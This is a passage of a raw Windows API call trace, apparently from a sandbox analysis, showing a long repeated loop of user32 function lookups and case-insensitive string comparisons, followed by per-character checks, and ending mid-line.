[0013.273] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.273] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.273] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.273] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.273] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.273] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.273] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.273] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.273] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.273] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.273] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.273] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.273] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.273] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.273] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.273] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.273] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.273] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.273] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.273] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.273] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.274] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.274] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.274] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.274] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.274] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.274] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.274] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.274] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.274] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.274] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.274] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.274] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.274] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.274] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.274] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.274] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.274] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.274] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.274] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.274] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.275] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.275] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.275] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.275] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.275] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.275] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.275] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.275] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.275] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.275] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.275] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.275] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.275] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.275] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.275] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.275] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.275] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.275] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.275] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.275] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.275] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.276] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.276] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.276] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.276] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.276] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.276] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.276] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.276] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.276] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.276] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.276] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.276] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.276] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.276] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.276] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.276] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.276] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.276] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.276] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.276] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.276] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.276] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.277] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.277] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.277] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.277] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.277] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.277] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.277] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.277] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.277] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.277] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.277] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.277] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.277] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.277] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.277] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.277] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.277] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.277] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.277] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.277] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.277] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.277] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.278] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.278] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.278] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.278] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.278] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.278] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.278] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.278] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.278] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.278] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.278] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.278] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.278] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.278] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.278] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.278] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.278] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.278] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.278] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.278] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.278] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.279] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.279] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.279] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.279] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.279] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.279] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.279] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.279] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.279] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.279] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.279] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.279] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.279] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.279] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.279] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.279] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.279] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.279] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.279] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.279] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.279] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.280] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.280] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.280] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.280] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.280] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.280] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.280] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.280] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.280] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.280] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.280] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.280] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.280] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.280] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.280] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.280] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.280] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.281] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.281] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.281] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.281] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.281] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.281] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.281] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.281] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.281] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.281] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.281] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.288] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.288] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.288] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.288] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.288] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.288] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.288] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.288] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.288] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.288] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.289] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.289] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.289] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.289] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.289] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.289] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.289] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.289] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.289] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.289] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.289] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.289] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.289] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.289] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.289] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.289] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.289] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.289] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.289] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.289] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.289] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.290] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.290] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.290] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.290] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.290] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.290] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.290] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.290] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.290] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.290] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.290] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.290] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.290] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.290] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.290] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.290] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.290] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.290] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.290] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.290] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.291] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.291] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.291] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.291] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.291] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.291] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.291] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.291] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.291] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.291] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.291] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.291] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.291] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.291] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.291] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.291] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.291] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.291] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.291] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.291] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.292] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.292] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.292] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.292] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.292] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.292] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.292] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.292] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.292] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.292] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.292] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.292] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.292] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.292] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.292] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.292] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.292] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.292] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.292] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.292] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.292] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.293] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.293] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.293] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.293] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.293] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.293] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.293] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.293] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.293] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.293] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.293] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.293] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.293] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.293] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.294] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.294] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.294] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.294] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.294] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.294] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.294] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.294] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.297] IsCharLowerA (ch=83) returned 0 [0013.297] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.297] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.297] IsCharLowerA (ch=84) returned 0 [0013.297] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.297] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.297] IsCharLowerA (ch=85) returned 0 [0013.297] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.297] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.297] IsCharLowerA (ch=86) returned 0 [0013.297] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.298] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.298] IsCharLowerA (ch=87) returned 0 [0013.298] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.298] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.298] IsCharLowerA (ch=88) returned 0 [0013.298] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.298] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.298] IsCharLowerA (ch=89) returned 0 [0013.298] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.298] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.298] IsCharLowerA (ch=65) returned 0 [0013.298] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.298] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.298] IsCharLowerA (ch=66) returned 0 [0013.298] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.298] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.298] IsCharLowerA (ch=67) returned 0 [0013.298] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.298] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.298] IsCharLowerA (ch=68) returned 0 [0013.298] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.298] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.298] IsCharLowerA (ch=69) returned 0 [0013.298] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.298] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.298] IsCharLowerA (ch=70) returned 0 [0013.298] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.298] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.298] IsCharLowerA (ch=71) returned 0 [0013.298] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.298] GetProcAddress (hModule=0x765b0000, 